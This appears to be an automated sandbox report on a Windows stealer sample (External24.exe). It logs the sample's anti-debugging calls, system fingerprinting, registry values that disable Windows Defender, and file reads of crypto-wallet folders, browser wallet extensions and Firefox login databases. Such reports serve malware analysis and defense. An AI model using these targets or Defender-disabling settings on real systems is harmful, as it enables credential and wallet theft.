Malware Configuration

Yara Signatures

Dropped Files

Memory Dumps

Sigma Signatures

System Summary

HIPS / PFW / Operating System Protection Evasion

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Change of critical system settings

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
External24.exe

Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: 15_2_0062A2B5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	15_2_0062A2B5
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: 15_2_0062A284 SetUnhandledExceptionFilter,	15_2_0062A284
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_0068A2B5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	21_2_0068A2B5
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_0068A284 SetUnhandledExceptionFilter,	21_2_0068A284
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00B84184 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	21_2_00B84184
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00B84311 SetUnhandledExceptionFilter,	21_2_00B84311
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00B8451D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	21_2_00B8451D
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00B88A64 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	21_2_00B88A64

Source: Lawyers.pif, 0000000A.00000000.1667330345.0000000000715000.00000002.00000001.01000000.00000005.sdmp, Lawyers.pif, 0000000A.00000003.1677686643.00000000047B1000.00000004.00000800.00020000.00000000.sdmp, PixelFlow.pif, 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: PixelFlow.pif, Lawyers.pif	Binary or memory string: Shell_TrayWnd

Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: CreateDirectoryA,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetCurrentHwProfileA,GetModuleHandleExA,GetModuleFileNameA,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetComputerNameA,GetUserNameA,GetDesktopWindow,GetWindowRect,GetUserDefaultLocaleName,GetKeyboardLayoutList,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,GetLocalTime,GetSystemTime,GetTimeZoneInformation,TzSpecificLocalTimeToSystemTime,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetSystemInfo,GlobalMemoryStatusEx,EnumDisplayDevicesA,EnumDisplayDevicesA,CreateToolhelp32Snapshot,Process32First,Process32Next,Process32Next,CloseHandle,RegOpenKeyExA,RegEnumKeyExA,wsprintfA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,RegCloseKey,	21_2_00C306D0
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: GetACP,IsValidCodePage,GetLocaleInfoW,	21_2_00BA2B5A
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: GetLocaleInfoW,	21_2_00BA2D5F
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: EnumSystemLocalesW,	21_2_00BA2EEC

Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{B99BD73F-BA9A-4579-8F31-FFF38CE1CEEC}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions	Registry value created: Exclusions_Extensions 1	Jump to behavior
Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{B99BD73F-BA9A-4579-8F31-FFF38CE1CEEC}Machine\SOFTWARE\Policies\Microsoft\Windows Defender	Registry value created: DisableAntiSpyware 1	Jump to behavior
Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{B99BD73F-BA9A-4579-8F31-FFF38CE1CEEC}Machine\SOFTWARE\Policies\Microsoft\Windows Defender	Registry value created: DisableRoutinelyTakingAction 1	Jump to behavior
Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{B99BD73F-BA9A-4579-8F31-FFF38CE1CEEC}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableBehaviorMonitoring 1	Jump to behavior
Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{B99BD73F-BA9A-4579-8F31-FFF38CE1CEEC}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableOnAccessProtection 1	Jump to behavior
Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{B99BD73F-BA9A-4579-8F31-FFF38CE1CEEC}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableScanOnRealtimeEnable 1	Jump to behavior
Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{B99BD73F-BA9A-4579-8F31-FFF38CE1CEEC}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableRealtimeMonitoring 1	Jump to behavior
Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{B99BD73F-BA9A-4579-8F31-FFF38CE1CEEC}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableIOAVProtection 1	Jump to behavior
Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{B99BD73F-BA9A-4579-8F31-FFF38CE1CEEC}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableRawWriteNotification 1	Jump to behavior

Source: Yara match	File source: 00000015.00000002.3501596780.0000000000F26000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.3035585776.00000000058AF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.3349195349.0000000000F26000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Lawyers.pif PID: 2304, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\7yC9aM3nOPMh37Qvw5GmIXM.zip, type: DROPPED

Source: Lawyers.pif, 00000015.00000002.3501287006.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: Lawyers.pif, 00000015.00000002.3501596780.0000000000F26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\ElectronCash\wallets
Source: Lawyers.pif, 00000015.00000002.3501596780.0000000000F26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Jaxx\Local Storagep
Source: Lawyers.pif, 00000015.00000002.3501287006.0000000000EA7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: Lawyers.pif, 00000015.00000002.3501596780.0000000000F26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ethereum\wallets7
Source: Lawyers.pif, 00000015.00000002.3501287006.0000000000EA7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: Lawyers.pif, 00000015.00000002.3501596780.0000000000F26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ethereum\wallets7

Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig\CURRENT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi\CURRENT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\places.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn\CURRENT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi\CURRENT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\chrome-extension_blnieiiffboillknjnepogjhkgnoapac_0.indexeddb.leveldb\CURRENT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\chrome-extension_cjelfplplebdjjenllpjcblmjkfcffne_0.indexeddb.leveldb\CURRENT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih\CURRENT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln\CURRENT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\signons.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln\CURRENT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk\CURRENT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\signons.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\logins.json	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih\CURRENT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\CURRENT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig\CURRENT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\CURRENT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk\CURRENT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\kpfopkelmapcoipemfendmdcghnegimn\CURRENT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENT	Jump to behavior